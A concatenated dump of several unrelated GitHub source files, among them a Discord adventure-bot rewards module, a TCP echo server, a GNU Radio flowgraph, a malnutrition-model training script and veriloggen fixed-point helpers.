Dunes Badge 1\")\n rewards.append(\"12 Sand\")\n rewards.append(\"3 Glass\")\n elif ran1 <= 31:\n userData[\"Sand\"] += 8\n userData[\"Glass\"] += 2\n rewards.append(\"2 Glass\")\n rewards.append(\"8 Sand\")\n elif ran1 <= 25:\n userData[\"Sand\"] += 5\n userData[\"Glass\"] += 1\n rewards.append(\"1 Glass\")\n rewards.append(\"5 Sand\")\n elif ran1 <= 16:\n userData[\"Sand\"] += 3\n rewards.append(\"3 Sand\")\n\n #Insert\n elif lootID == \"Snow\":\n catData[\"SNC\"] += 1\n ran1 = int(random.randint(1, 32))\n if ran1 == 32:\n userData[\"1SN\"] = True\n userData[\"Snow\"] += 8\n userData[\"Ice\"] += 4\n rewards.append(\"Frost Wastelands Badge 1\")\n rewards.append(\"8 Snow\")\n rewards.append(\"4 Ice\")\n elif ran1 <= 31:\n userData[\"Snow\"] += 6\n userData[\"Ice\"] += 3\n rewards.append(\"3 Ice\")\n rewards.append(\"6 Snow\")\n elif ran1 <= 25:\n userData[\"Snow\"] += 4\n userData[\"Ice\"] += 2\n rewards.append(\"2 Ice\")\n rewards.append(\"4 Snow\")\n elif ran1 <= 16:\n userData[\"Snow\"] += 2\n userData[\"Ice\"] += 1\n rewards.append(\"2 Snow\")\n rewards.append(\"1 Ice\")\n\n #Insert\n elif lootID == \"Jungle\":\n catData[\"OC\"] += 1\n ran1 = int(random.randint(1, 20))\n if ran1 == 20:\n userData[\"1O\"] = True\n userData[\"Grass\"] += 24\n userData[\"Wood\"] += 8\n userData[\"Corn\"] += 1 \n rewards.append(\"Orangutan Jungle Badge 1\")\n rewards.append(\"24 Grass\")\n rewards.append(\"8 Wood\")\n rewards.append(\"1 Corn!!(Rare)\")\n elif ran1 <= 19:\n userData[\"Grass\"] += 16\n userData[\"Wood\"] += 5\n rewards.append(\"16 Grass\")\n rewards.append(\"5 Wood\")\n elif ran1 <= 15:\n userData[\"Grass\"] += 10\n userData[\"Wood\"] += 3\n rewards.append(\"10 Grass\")\n rewards.append(\"3 Wood\")\n elif ran1 <= 9:\n userData[\"Grass\"] += 6\n userData[\"Wood\"] += 2\n rewards.append(\"6 Grass\")\n rewards.append(\"2 Wood\")\n\n #Insert\n elif lootID == \"Glass\":\n catData[\"GDC\"] += 1\n ran1 = int(random.randint(1, 50))\n if ran1 >= 48:\n userData[\"1GD\"] = True\n userData[\"Sand\"] += 24\n userData[\"Ice\"] += 4\n userData[\"Gem\"] += 1 \n rewards.append(\"Glass Desert Badge 1\")\n rewards.append(\"24 Sand\")\n rewards.append(\"8 Ice\")\n rewards.append(\"1 Gem!!(Rare)\")\n elif ran1 == 11:\n userData[\"3GD\"] = True\n userData[\"Gem\"] += 3 \n rewards.append(\"3 Gems!!! (Super Rare)\") \n rewards.append(\"Glass Desert Badge 3\") \n elif ran1 <= 47:\n userData[\"Sand\"] += 16\n userData[\"Glass\"] += 8\n #FINISH\n rewards.append(\"16 Sand\")\n rewards.append(\"8 Glass\")\n elif ran1 <= 37:\n userData[\"Sand\"] += 10\n userData[\"Glass\"] += 5\n rewards.append(\"10 Sand\")\n rewards.append(\"5 Glass\")\n elif ran1 <= 20:\n userData[\"Sand\"] += 8\n userData[\"Glass\"] += 4\n rewards.append(\"8 Sand\")\n rewards.append(\"4 Glass\")\n\n #Insert\n elif lootID == \"Ohio\":\n catData[\"OHC\"] += 1\n ran1 = int(random.randint(1, 50))\n if ran1 >= 48:\n userData[\"1OH\"] = True\n userData[\"Wood\"] += 20\n userData[\"Gem\"] += 1\n userData[\"Corn\"] += 4\n userData[\"Kernal\"] += 23\n rewards.append(\"Ohio Badge 1\")\n rewards.append(\"20 Wood\")\n rewards.append(\"23 Kernal\")\n rewards.append(\"4 Corn!(Rare)\")\n rewards.append(\"1 Gem!!(Rare)\")\n elif ran1 == 8:\n userData[\"3OH\"] = True\n userData[\"Corn\"] += 6\n userData[\"Kernal\"] += 69\n rewards.append(\"69 Kernal!(Rare)\")\n rewards.append(\"6 Corn!!! (Super Rare)\") \n rewards.append(\"Ohio Badge 3\") \n elif ran1 <= 47:\n userData[\"Wood\"] += 14\n userData[\"Corn\"] += 1\n userData[\"Kernal\"] += 16\n rewards.append(\"16 Kernal\")\n rewards.append(\"14 Wood\")\n rewards.append(\"1 Corn\")\n elif ran1 <= 37:\n userData[\"Wood\"] += 10\n userData[\"Kernal\"] += 12\n rewards.append(\"12 Kernal\")\n rewards.append(\"10 Wood\")\n elif ran1 <= 20:\n userData[\"Wood\"] += 6\n userData[\"Kernal\"] += 10\n rewards.append(\"10 Kernal\")\n rewards.append(\"6 Wood\")\n\n db.RewardHold.insert_one({\"_id\":user_id,\"rewards\":rewards})\n rewards.clear()\n db.OnAdventure.replace_one({\"_id\":user_id}, catData)\n db.UserAdventure.replace_one({\"_id\": user_id},userData)\n\ndef description_Tree(user_id:int)->str:\n userData = db.UserAdventure.find_one({\"_id\": user_id})\n #True and Flase Will be emojis True(Badge) False(?)\n G1,G2,G3,G4 = \"E\",\"E\",\"E\",\"E\"\n if userData[\"1G\"] == True:\n G1 = \"✅\"\n else:\n G1 = \"❔\"\n if userData[\"2G\"] == True:\n G2 = \"✅\"\n else:\n G2 = \"❔\"\n if userData[\"3G\"] == True:\n G3 = \"✅\"\n else:\n G3 = \"❔\"\n if userData[\"4G\"] == True:\n G4 = \"✅\"\n else:\n G4 = \"❔\"\n\n Grass = \"E\"\n if userData[\"Grass\"] > 0:\n Grass = \"🍃\"\n else:\n Grass = \"❔\"\n \n des = f\"We all start some where and the Grasslands is a perfect starting area with lots of green hills and meadows.\\nRisk 0%\\nBadges unlocked {G1},{G2},{G3},{G4}\\nLoot in area {Grass}\"\n return des\n\ndef description_Sand(user_id:int)->str:\n userData = db.UserAdventure.find_one({\"_id\": user_id})\n #True and Flase Will be emojis True(Badge) False(?)\n S1,S2 = \"E\",\"E\"\n if userData[\"1S\"] == True:\n S1 == \"✅\"\n else:\n S1 == \"❔\"\n if userData[\"2S\"] == True:\n S2 == \"✅\"\n else:\n S2 == \"❔\"\n Sand,Glass = \"E\",\"E\"\n if userData[\"Sand\"] > 0:\n Sand = \"⏳\"\n else:\n Sand = \"❔\"\n if userData[\"Glass\"] > 0:\n Glass = \"🪟\"\n else: \n Glass = \"❔\"\n des = f\"As you venture further you enter the dunes filled with nothing but sand and that one tumbleweed durring a shot-off, Hopefully you will find a dessert temple \\nRisk 0%\\nBadges unlocked {S1},{S2}\\nLoot in area {Sand},{Glass}\"\n return des\n\ndef description_Frost(user_id:int)->str:\n userData = db.UserAdventure.find_one({\"_id\": user_id})\n #True and Flase Will be emojis True(Badge) False(?)\n SN1,SN2 = \"E\",\"E\"\n if userData[\"1SN\"] == True:\n SN1 == \"✅\"\n else:\n SN1 == \"❔\"\n if userData[\"2SN\"] == True:\n SN2 == \"✅\"\n else:\n SN2 == \"❔\"\n Snow,Ice = \"E\",\"E\"\n if userData[\"Snow\"] > 0:\n Snow == \"❄️\"\n else:\n Snow == \"❔\"\n if userData[\"Ice\"] > 0:\n Ice = \"🧊\"\n else: \n Ice = \"❔\"\n \n des = f\"After you finish crossing the sand dessert you approach a new dessert made out of snow and ice. With blue spruces on a flat wasteland who knows if you will find anything good.\\nRisk 0%\\nBadges unlocked {SN1},{SN2}\\nLoot in area {Snow},{Ice}\"\n return des\n\n\ndef description_Jungle(user_id:int)->str:\n userData = db.UserAdventure.find_one({\"_id\": user_id})\n #True and Flase Will be emojis True(Badge) False(?)\n O1,O2 = \"E\",\"E\"\n if userData[\"1O\"] == True:\n O1 == \"✅\"\n else:\n O1 == \"❔\"\n if userData[\"2O\"] == True:\n O2 == \"✅\"\n else:\n O2 == \"❔\"\n Grass,Wood,Corn = \"E\",\"E\",\"E\"\n if userData[\"Grass\"] > 0:\n Grass == \"🍃\"\n else:\n Grass == \"❔\"\n if userData[\"Wood\"] > 0:\n Wood = \"🪵\"\n else: \n Wood = \"❔\"\n if userData[\"Corn\"] > 0:\n Corn = \"🌽\"\n else: \n Corn = \"❔\"\n \n des = f\"You enter a forest filled with monkeys idkkk what else to say I am tired\\nRisk 5%\\nBadges unlocked {O1},{O2}\\nLoot in area {Grass},{Wood},{Corn}\"\n return des\n\n\n\ndef description_EnchForest(user_id:int)->str:\n userData = db.UserAdventure.find_one({\"_id\": user_id})\n #True and Flase Will be emojis True(Badge) False(?)\n O1,O2 = \"E\",\"E\"\n if userData[\"1O\"] == True:\n O1 == \"✅\"\n else:\n O1 == \"❔\"\n if userData[\"2O\"] == True:\n O2 == \"✅\"\n else:\n O2 == \"❔\"\n Grass,Wood = \"E\",\"E\"\n if userData[\"Grass\"] > 0:\n Grass == \"🍃\"\n else:\n Grass == \"❔\"\n if userData[\"Wood\"] > 0:\n Wood = \"🪵\"\n else: \n Wood = \"❔\"\n \n des = f\"\\nRisk 5%\\nBadges unlocked {G1},{G2},{G3},{G4}\\nLoot in area {Grass}\"\n return des\n\n\n\ndef description_Glass(user_id:int)->str:\n userData = db.UserAdventure.find_one({\"_id\": user_id})\n GD1,GD2,GD3 = \"E\",\"E\",\"E\"\n if userData[\"1GD\"] == True:\n GD1 == \"✅\"\n else:\n GD1 == \"❔\"\n if userData[\"2GD\"] == True:\n GD2 == \"✅\"\n else:\n GD2 == \"❔\"\n if userData[\"3GD\"] == True:\n GD3 == \"✅\"\n else:\n GD3 == \"❔\"\n Sand,Ice,Glass,Gem = \"E\",\"E\",\"E\",\"E\"\n if userData[\"Sand\"] > 0:\n Sand == \"⏳\"\n else:\n Sand == \"❔\"\n if userData[\"Ice\"] > 0:\n Ice = \"🧊\"\n else: \n Ice = \"❔\"\n if userData[\"Glass\"] > 0:\n Glass = \"🪟\"\n else: \n Glass = \"❔\"\n if userData[\"Gem\"] > 0:\n Gem = \"💎\"\n else: \n Gem = \"❔\"\n des = f\"\\nRisk 5%\\nBadges unlocked {GD1},{GD2},{GD3}\\nLoot in area {Sand},{Glass},{Ice},{Gem}\"\n return des\n\ndef description_Ohio(user_id:int)->str:\n userData = db.UserAdventure.find_one({\"_id\": user_id})\n OH1,OH2,OH3 = \"E\",\"E\",\"E\"\n if userData[\"1OH\"] == True:\n OH1 == \"<:amonguspog:886652968051560488>\"\n else:\n OH1 == \"❔\"\n if userData[\"2OH\"] == True:\n OH2 == \"<:amonguspog:886652968051560488>\"\n else:\n OH2 == \"❔\"\n if userData[\"3OH\"] == True:\n OH3 == \"<:amonguspog:886652968051560488>\"\n else:\n OH3 == \"❔\"\n Wood,Kernal,Gem,Corn = \"E\",\"E\",\"E\",\"E\"\n if userData[\"Wood\"] > 0:\n Wood = \"🪵\"\n else:\n Wood == \"❔\"\n if userData[\"Kernal\"] > 0:\n Kernal = \"🍿\"\n else: \n Kernal = \"❔\"\n if userData[\"Corn\"] > 0:\n Corn = \"🌽\"\n else: \n Corn = \"❔\"\n if userData[\"Gem\"] > 0:\n Gem = \"💎\"\n else: \n Gem = \"❔\"\n des = f\"\\nRisk 0%\\nBadges unlocked {OH1},{OH2},{OH3}\\nLoot in area {Kernal},{Wood},{Gem},{Corn}\"\n return des","repo_name":"TrippingLettuce/AdventureBot","sub_path":"rewards.py","file_name":"rewards.py","file_ext":"py","file_size_in_byte":12400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23513460659","text":"import socket\nimport termcolor\nimport sys\n# Configure the Server's IP and PORT\nPORT = 8089\nIP = \"212.128.253.101\"\nMAX_OPEN_REQUESTS = 5\n\ndef process_client(cs): #The parameter will be the socket for communicating with the client\n # Read client message.\n msg = cs.recv(2048).decode(\"utf-8\")\n\n termcolor.cprint(\"Message from the client: {}\".format(msg), 'blue')\n if msg == 'EXIT':\n sys.exit(0)\n\n cs.send(str.encode(msg)) #We have to decode and then code again\n #Sending message to the client\n # Close the socket\n cs.close()\n\n# create a socket for connecting with the clients\nserversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n\nserversocket.bind((IP, PORT))\n\nserversocket.listen(MAX_OPEN_REQUESTS)\n\nprint(\"Socket ready: {}\".format(serversocket))\n\nwhile True:\n # The server is waiting for connections\n print(\"Waiting for connections at {}, {} \".format(IP, PORT))\n (clientsocket, address) = serversocket.accept() #Once the client is connected it will print the IP\n\n #. . . Process the client request\n print(\"Attending client: {}\".format(address))\n\n process_client(clientsocket)\n\n","repo_name":"gemabbaz/2018-19-PNE-practices","sub_path":"Session 9/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3065694783","text":"from matplotlib import pyplot as plt\nimport pandas as pd\n\n\ndef plotReports(assets, stocks, crypto):\n\tf1 = plt.figure(1)\n\tax1 = f1.add_axes([0, 0, 1, 1])\n\tax1.axis('equal')\n\t\n\tax1.pie(assets[1], labels=assets[0], autopct='%1.2f%%')\n\n\n\tf2 = plt.figure(2)\n\tax2 = f2.add_axes([0, 0, 1, 1])\n\tax2.axis('equal')\n\tax2.pie(stocks[1], labels=stocks[0], autopct='%1.2f%%')\n\n\n\tf3 = plt.figure(3)\n\tax3 = f3.add_axes([0, 0, 1, 1])\n\tax3.axis('equal')\n\tax3.pie(crypto[1], labels=crypto[0], autopct='%1.2f%%')\n\n\tplt.show()\n","repo_name":"MarkusZoppelt/finance","sub_path":"reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42605724975","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/items.html\n\nfrom scrapy.item import Item, Field\n\n\nclass Bitcoininfo1Item(Item):\n # define the fields for your item here like:\n # name = scrapy.Field()\n post = Field()\n page_number = Field()\n url = Field()\n author = Field()\n subject = Field()\n #time = Field()\n message_number = Field()","repo_name":"niranjan-sa/MerkelScience","sub_path":"bitcoininfo1/bitcoininfo1/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5350182662","text":"class Card:\n def __init__(self, image, name, type, nation, race, grade, power, critical, shield, skill, effect, regulation, number, rarity):\n self.image = image\n self.name = name\n self.type = type\n self.nation = nation\n self.race = race\n self.grade = grade\n self.power = power\n self.critical = critical\n self.shield = shield\n self.skill = skill\n self.effect = effect\n self.regulation = regulation\n self.number = number\n self.rarity = rarity","repo_name":"manhlamabc123/PDP-Area-data","sub_path":"card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71386581917","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#\n# SPDX-License-Identifier: GPL-3.0\n#\n# GNU Radio Python Flow Graph\n# Title: AccessControl\n# Description: IMPLEMENTACIÓN DE UN SISTEMA DE COMUNICACIONES BASADO EN SDR MEDIANTE GNU RADIO // Carpio_LoopezDeCastro_Jorge_tfg.pdf // C:\\Users\\Alex\\Dropbox\\DegreeProject\\Papers 2 // Pag. 25 o 39\n# GNU Radio version: 3.9.5.0\n\nfrom distutils.version import StrictVersion\n\nif __name__ == '__main__':\n import ctypes\n import sys\n if sys.platform.startswith('linux'):\n try:\n x11 = ctypes.cdll.LoadLibrary('libX11.so')\n x11.XInitThreads()\n except:\n print(\"Warning: failed to XInitThreads()\")\n\nfrom PyQt5 import Qt\nfrom gnuradio import qtgui\nimport sip\nfrom gnuradio import blocks\nimport pmt\nfrom gnuradio import digital\nfrom gnuradio import gr\nfrom gnuradio.filter import firdes\nfrom gnuradio.fft import window\nimport sys\nimport signal\nfrom argparse import ArgumentParser\nfrom gnuradio.eng_arg import eng_float, intx\nfrom gnuradio import eng_notation\n\n\n\nfrom gnuradio import qtgui\n\nclass AccessControl(gr.top_block, Qt.QWidget):\n\n def __init__(self):\n gr.top_block.__init__(self, \"AccessControl\", catch_exceptions=True)\n Qt.QWidget.__init__(self)\n self.setWindowTitle(\"AccessControl\")\n qtgui.util.check_set_qss()\n try:\n self.setWindowIcon(Qt.QIcon.fromTheme('gnuradio-grc'))\n except:\n pass\n self.top_scroll_layout = Qt.QVBoxLayout()\n self.setLayout(self.top_scroll_layout)\n self.top_scroll = Qt.QScrollArea()\n self.top_scroll.setFrameStyle(Qt.QFrame.NoFrame)\n self.top_scroll_layout.addWidget(self.top_scroll)\n self.top_scroll.setWidgetResizable(True)\n self.top_widget = Qt.QWidget()\n self.top_scroll.setWidget(self.top_widget)\n self.top_layout = Qt.QVBoxLayout(self.top_widget)\n self.top_grid_layout = Qt.QGridLayout()\n self.top_layout.addLayout(self.top_grid_layout)\n\n self.settings = Qt.QSettings(\"GNU Radio\", \"AccessControl\")\n\n try:\n if StrictVersion(Qt.qVersion()) < StrictVersion(\"5.0.0\"):\n self.restoreGeometry(self.settings.value(\"geometry\").toByteArray())\n else:\n self.restoreGeometry(self.settings.value(\"geometry\"))\n except:\n pass\n\n ##################################################\n # Variables\n ##################################################\n self.samp_rate = samp_rate = 32000\n\n ##################################################\n # Blocks\n ##################################################\n self.qtgui_number_sink_0 = qtgui.number_sink(\n gr.sizeof_char,\n 0,\n qtgui.NUM_GRAPH_HORIZ,\n 1,\n None # parent\n )\n self.qtgui_number_sink_0.set_update_time(0.10)\n self.qtgui_number_sink_0.set_title(\"\")\n\n labels = ['', '', '', '', '',\n '', '', '', '', '']\n units = ['', '', '', '', '',\n '', '', '', '', '']\n colors = [(\"black\", \"black\"), (\"black\", \"black\"), (\"black\", \"black\"), (\"black\", \"black\"), (\"black\", \"black\"),\n (\"black\", \"black\"), (\"black\", \"black\"), (\"black\", \"black\"), (\"black\", \"black\"), (\"black\", \"black\")]\n factor = [1, 1, 1, 1, 1,\n 1, 1, 1, 1, 1]\n\n for i in range(1):\n self.qtgui_number_sink_0.set_min(i, -1)\n self.qtgui_number_sink_0.set_max(i, 1)\n self.qtgui_number_sink_0.set_color(i, colors[i][0], colors[i][1])\n if len(labels[i]) == 0:\n self.qtgui_number_sink_0.set_label(i, \"Data {0}\".format(i))\n else:\n self.qtgui_number_sink_0.set_label(i, labels[i])\n self.qtgui_number_sink_0.set_unit(i, units[i])\n self.qtgui_number_sink_0.set_factor(i, factor[i])\n\n self.qtgui_number_sink_0.enable_autoscale(False)\n self._qtgui_number_sink_0_win = sip.wrapinstance(self.qtgui_number_sink_0.qwidget(), Qt.QWidget)\n self.top_layout.addWidget(self._qtgui_number_sink_0_win)\n self.digital_correlate_access_code_xx_ts_0 = digital.correlate_access_code_bb_ts('11100001010110101110100010010011',\n 0, 'packet_len')\n self.blocks_unpack_k_bits_bb_0 = blocks.unpack_k_bits_bb(8)\n self.blocks_tagged_stream_to_pdu_0 = blocks.tagged_stream_to_pdu(blocks.byte_t, 'packet_len')\n self.blocks_tagged_stream_align_0 = blocks.tagged_stream_align(gr.sizeof_char*1, 'packet_len')\n self.blocks_pdu_to_tagged_stream_0 = blocks.pdu_to_tagged_stream(blocks.byte_t, 'packet_len')\n self.blocks_pack_k_bits_bb_0 = blocks.pack_k_bits_bb(8)\n self.blocks_file_source_0 = blocks.file_source(gr.sizeof_char*1, 'G:\\\\My Drive\\\\ProgrammingProject\\\\MaquinaNativa1\\\\encrypted_data.bin', True, 0, 0)\n self.blocks_file_source_0.set_begin_tag(pmt.PMT_NIL)\n self.blocks_file_sink_1 = blocks.file_sink(gr.sizeof_char*1, 'G:\\\\My Drive\\\\ProgrammingProject\\\\MaquinaNativa1\\\\encrypted_data_rr.bin', False)\n self.blocks_file_sink_1.set_unbuffered(False)\n\n\n ##################################################\n # Connections\n ##################################################\n self.msg_connect((self.blocks_tagged_stream_to_pdu_0, 'pdus'), (self.blocks_pdu_to_tagged_stream_0, 'pdus'))\n self.connect((self.blocks_file_source_0, 0), (self.blocks_unpack_k_bits_bb_0, 0))\n self.connect((self.blocks_pack_k_bits_bb_0, 0), (self.blocks_file_sink_1, 0))\n self.connect((self.blocks_pdu_to_tagged_stream_0, 0), (self.blocks_pack_k_bits_bb_0, 0))\n self.connect((self.blocks_tagged_stream_align_0, 0), (self.blocks_tagged_stream_to_pdu_0, 0))\n self.connect((self.blocks_unpack_k_bits_bb_0, 0), (self.digital_correlate_access_code_xx_ts_0, 0))\n self.connect((self.digital_correlate_access_code_xx_ts_0, 0), (self.blocks_tagged_stream_align_0, 0))\n self.connect((self.digital_correlate_access_code_xx_ts_0, 0), (self.qtgui_number_sink_0, 0))\n\n\n def closeEvent(self, event):\n self.settings = Qt.QSettings(\"GNU Radio\", \"AccessControl\")\n self.settings.setValue(\"geometry\", self.saveGeometry())\n self.stop()\n self.wait()\n\n event.accept()\n\n def get_samp_rate(self):\n return self.samp_rate\n\n def set_samp_rate(self, samp_rate):\n self.samp_rate = samp_rate\n\n\n\n\ndef main(top_block_cls=AccessControl, options=None):\n\n if StrictVersion(\"4.5.0\") <= StrictVersion(Qt.qVersion()) < StrictVersion(\"5.0.0\"):\n style = gr.prefs().get_string('qtgui', 'style', 'raster')\n Qt.QApplication.setGraphicsSystem(style)\n qapp = Qt.QApplication(sys.argv)\n\n tb = top_block_cls()\n\n tb.start()\n\n tb.show()\n\n def sig_handler(sig=None, frame=None):\n tb.stop()\n tb.wait()\n\n Qt.QApplication.quit()\n\n signal.signal(signal.SIGINT, sig_handler)\n signal.signal(signal.SIGTERM, sig_handler)\n\n timer = Qt.QTimer()\n timer.start(500)\n timer.timeout.connect(lambda: None)\n\n qapp.exec_()\n\nif __name__ == '__main__':\n main()\n","repo_name":"Jorgealza9206/ProgrammingProject","sub_path":"History/MaquinaNativa1/AccessControl.py","file_name":"AccessControl.py","file_ext":"py","file_size_in_byte":7185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"37580874837","text":"# --- Directions\n# Write a function that accepts a string. The function should\n# capitalize the first letter of each word in the string then\n# return the capitalized string.\n# --- Examples\n# capitalize('a short sentence') --> 'A Short Sentence'\n# capitalize('a lazy fox') --> 'A Lazy Fox'\n# capitalize('look, it is working!') --> 'Look, It Is Working!'\n\n\nimport pytest\n\n\ndef capitalize_string(s):\n result = ''\n # get words\n words = s.split()\n # lowercase each word\n word_list = [word.lower() for word in words]\n for word in word_list:\n # uppercase first letter of each word and append to result string along with space\n word = word[0].upper() + word[1:]\n result += word+' '\n # remove trailing space\n return result.strip()\n\n\ndef test_capitalize_string():\n assert capitalize_string('look, it is working!') == 'Look, It Is Working!'\n assert capitalize_string('a lazy fox') == 'A Lazy Fox'\n assert capitalize_string('look, it is working!') == 'Look, It Is Working!'\n\n\n","repo_name":"chefmohima/CodeBootcampUdemy","sub_path":"capitalize_string.py","file_name":"capitalize_string.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28770630001","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nimport collections\nfrom typing import List\n\n\nclass Solution:\n def distanceK(self, root: TreeNode, target: TreeNode, k: int) -> List[int]:\n par = dict()\n\n def link_parent(cr, p):\n if cr:\n par[cr] = p\n link_parent(cr.left, cr)\n link_parent(cr.right, cr)\n\n link_parent(root, None)\n\n ans = []\n q = collections.deque([target])\n seen = {target}\n level = 0\n while q:\n prev_ln = len(q)\n for i in range(prev_ln):\n u = q.popleft()\n if level == k:\n ans.append(u.val)\n if level < k:\n for v in [u.left, u.right, par[u]]:\n if v and v not in seen:\n seen.add(v)\n q.append(v)\n level += 1\n return ans\n\n\n\n","repo_name":"shahidul2k9/problem-solution","sub_path":"leetcode/863. All Nodes Distance K in Binary Tree.py","file_name":"863. All Nodes Distance K in Binary Tree.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"51"} +{"seq_id":"45740419686","text":"from keras.models import load_model\nimport numpy as np\nimport os\nfrom model import MeronSmart\nfrom model import plot_confusion_matrix\n\n# Flags\ntrain_model_flg = True\ntune_hyperparams_flg = False\nsave_model_flg = True\n\n# Files and directories\nbase_dir = '/Data/kimetrica/meron/kenya_data/meron_link_data'\nfeatures_dir = '/Data/kimetrica/meron/features_fc6'\nmodel_dir = '/Data/kimetrica/meron/models'\nmeta_file = 'meron_meta_processed.csv'\nhyper_param_file = '/Data/kimetrica/meron/hyperparams/'\n\nclasses = ['normal', 'moderate acute malnutrition', 'severe acute malnutrition']\n\n# hyperparameters to optimizer over\nparam_dist = {'neurons': [8, 16, 32, 64, 128, 256],\n 'dropout': [0, 0.25, 0.5, 0.75, 0.9],\n 'activation': [\"relu\", \"elu\", \"tanh\"],\n 'optimizer': [\"adam\", \"nadam\", \"adadelta\", \"rmsprop\"],\n 'task_type': [\"classification\"]}\n\ntuned_params = {'neurons': 64,\n 'dropout': 0.25,\n 'activation': \"relu\",\n 'optimizer': \"adam\",\n 'task_type': \"classification\"}\n\n# Instantiate class\nmeron = MeronSmart()\n\n# Prep train/test data\ndata_tt = meron.prep_data(features_dir,\n os.path.join(base_dir, meta_file),\n out_fname=None,\n cname_ind_class='maln_class',\n cname_ind='wfh',\n cname_merge='photo_id')\n\n# Train nn with option to tune hyper parameters\nif tune_hyperparams_flg:\n tuned_params = meron.optimize_hyperparameters(\n data_tt['train_x'], data_tt['train_y'],\n data_tt['test_x'], data_tt['test_y'],\n param_dist,\n )\n# else:\n# tuned_params = np.load(hyper_param_file).item()\n\nif train_model_flg:\n conv = meron.train_model(data_tt[\"train_x\"],\n data_tt[\"train_y\"],\n data_tt[\"test_x\"],\n data_tt[\"test_y\"],\n tuned_params,\n out_fname=save_model_flg)\n\nelse:\n conv = load_model(os.path.join(model_dir, \"conv_model_classification.h5\"))\n\n# Produce predicted probabilities for training and test examples\nconv_probs_test = conv.predict(data_tt[\"test_x_conv\"])\n\n# Convert probabilities to actual predictions\nconv_test = np.argmax(conv_probs_test, axis=1)\n\n# le = sk.preprocessing.LabelEncoder()\n# le.fit(classes)\n# y_pred = np.argmax(conv_probs_test, axis=1)\n# y_pred = le.inverse_transform(y_pred)\n\n# Evaluate results\nplot_confusion_matrix(data_tt[\"test_y\"], conv_test, classes, normalize=True,\n savefig='/Data/kimetrica/meron/figs/cm.jpg')\n","repo_name":"kimetrica/MERON_model","sub_path":"meron/main_example.py","file_name":"main_example.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"19940360560","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nimport os\nimport sys\nimport copy\n\nimport veriloggen.core.vtypes as vtypes\nfrom veriloggen.core.vtypes import _Numeric\nfrom veriloggen.core.vtypes import _Variable\nfrom veriloggen.core.vtypes import _Constant\n\ndef to_fixed(value, point, signed=False):\n if point < 0:\n raise ValueError('point must be more than 0')\n \n if point == 0:\n return value\n \n if isinstance(value, (int, bool, float)) and isinstance(point, int):\n mag = 2 ** point\n return int(value * mag)\n \n if isinstance(value, (int, bool)):\n mag = vtypes.Int(2) ** point\n return vtypes.Int(value) * mag\n \n if isinstance(value, float):\n mag = vtypes.Int(2) ** point\n return vtypes.Float(value) * mag\n \n if hasattr(value, 'signed') and value.signed:\n signed = True\n \n return shift_left(value, point, signed)\n\ndef fixed_to_int(value, point, signed=False):\n if point < 0:\n raise ValueError('point must be more than 0')\n \n if point == 0:\n return value\n \n if isinstance(value, (int, bool, float)) and isinstance(point, int):\n mag = 2 ** point\n return int(value / mag)\n \n if isinstance(value, (int, bool, float)):\n mag = vtypes.Int(2) ** point\n return vtypes.Int(value) / mag\n \n if hasattr(value, 'signed') and value.signed:\n signed = True\n \n return shift_right(value, point, signed)\n\ndef fixed_to_int_low(value, point):\n if point < 0:\n raise ValueError('point must be more than 0')\n \n if point == 0:\n return 0\n \n if isinstance(value, (int, bool, float)) and isinstance(point, int):\n mag = 2 ** point\n return int(value % mag)\n \n return vtypes.And(value, vtypes.Repeat(vtypes.Int(1, 1), point))\n\ndef fixed_to_real(value, point, signed=False):\n if point < 0:\n raise ValueError('point must be more than 0')\n \n if point == 0:\n return vtypes.SystemTask('itor', value)\n\n if isinstance(value, float):\n raise TypeError(\"value is already float.\")\n \n if isinstance(value, (int, bool)) and isinstance(point, int):\n mag = 2 ** point\n return float(value) / mag\n\n if hasattr(value, 'signed') and value.signed:\n signed = True\n\n width = value.bit_length()\n msb = (value[width - 1] if isinstance(value, vtypes._Variable) else\n (value >> (width - 1)) & 0x1)\n \n v0 = (vtypes.SystemTask('itor', fixed_to_int(value, point)) +\n vtypes.SystemTask('itor', fixed_to_int_low(value, point)) /\n vtypes.SystemTask('itor', vtypes.Int(2) ** point))\n \n nv = vtypes.Unot(value) + 1\n v1 = ((vtypes.SystemTask('itor', fixed_to_int(nv, point)) +\n vtypes.SystemTask('itor', fixed_to_int_low(nv, point)) /\n vtypes.SystemTask('itor', vtypes.Int(2) ** point))) * vtypes.SystemTask('itor', -1)\n \n return vtypes.Mux(signed and msb == 0, v0, v1)\n\n#-------------------------------------------------------------------------------\ndef adjust(left, right, lpoint, rpoint, signed=True):\n diff_lpoint = vtypes.Mux(rpoint < lpoint, 0, rpoint - lpoint)\n diff_rpoint = vtypes.Mux(lpoint < rpoint, 0, lpoint - rpoint)\n ldata = vtypes.Mux(diff_lpoint == 0, left, shift_left(left, diff_lpoint, signed))\n rdata = vtypes.Mux(diff_rpoint == 0, right, shift_left(right, diff_rpoint, signed))\n _ldata = vtypes.Mux(signed, 